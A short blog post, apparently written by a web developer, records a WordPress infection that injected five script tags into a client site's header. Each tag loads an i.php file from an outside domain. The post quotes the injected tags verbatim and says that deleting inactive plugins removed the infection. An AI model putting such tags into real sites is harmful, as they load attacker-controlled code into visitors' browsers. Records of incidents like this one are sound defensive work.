Today I encountered malware on WordPress that inserted several i.php requests into the website header, all with IDs starting with hello_newscript.

<script type='text/javascript' src='https://longtailmagic.com/domain/i.php?ver=5.6.2' id='hello_newscript0-js'></script>
<script type='text/javascript' src='https://jadsupport.com/includes/i.php?ver=5.6.2' id='hello_newscript1-js'></script>
<script type='text/javascript' src='https://magaliefonteneau.com/wp-content/i.php?ver=5.6.2' id='hello_newscript2-js'></script>
<script type='text/javascript' src='http://futuracp.com/images/i.php?ver=5.6.2' id='hello_newscript3-js'></script>
<script type='text/javascript' src='http://casualwoodcreations.com/images/i.php?ver=5.6.2' id='hello_newscript4-js'></script>
The client's website exhibited slow loading speeds. Upon inspecting the source code, several unloadable js files were discovered, as shown in the image below:

Then through source code analysis, it was found that the above code was injected. Fortunately, some servers of these malicious websites were shut down, and some had slow access speeds from China. So aside from slow speed, the website had no other impact.
I didn't have a chance to find out how this virus specifically infected the site, because after I deleted a few inactive plugins, the virus disappeared. It is suspected that the inactive plugins were infected.
This post is purely for record-keeping, hope you never encounter it.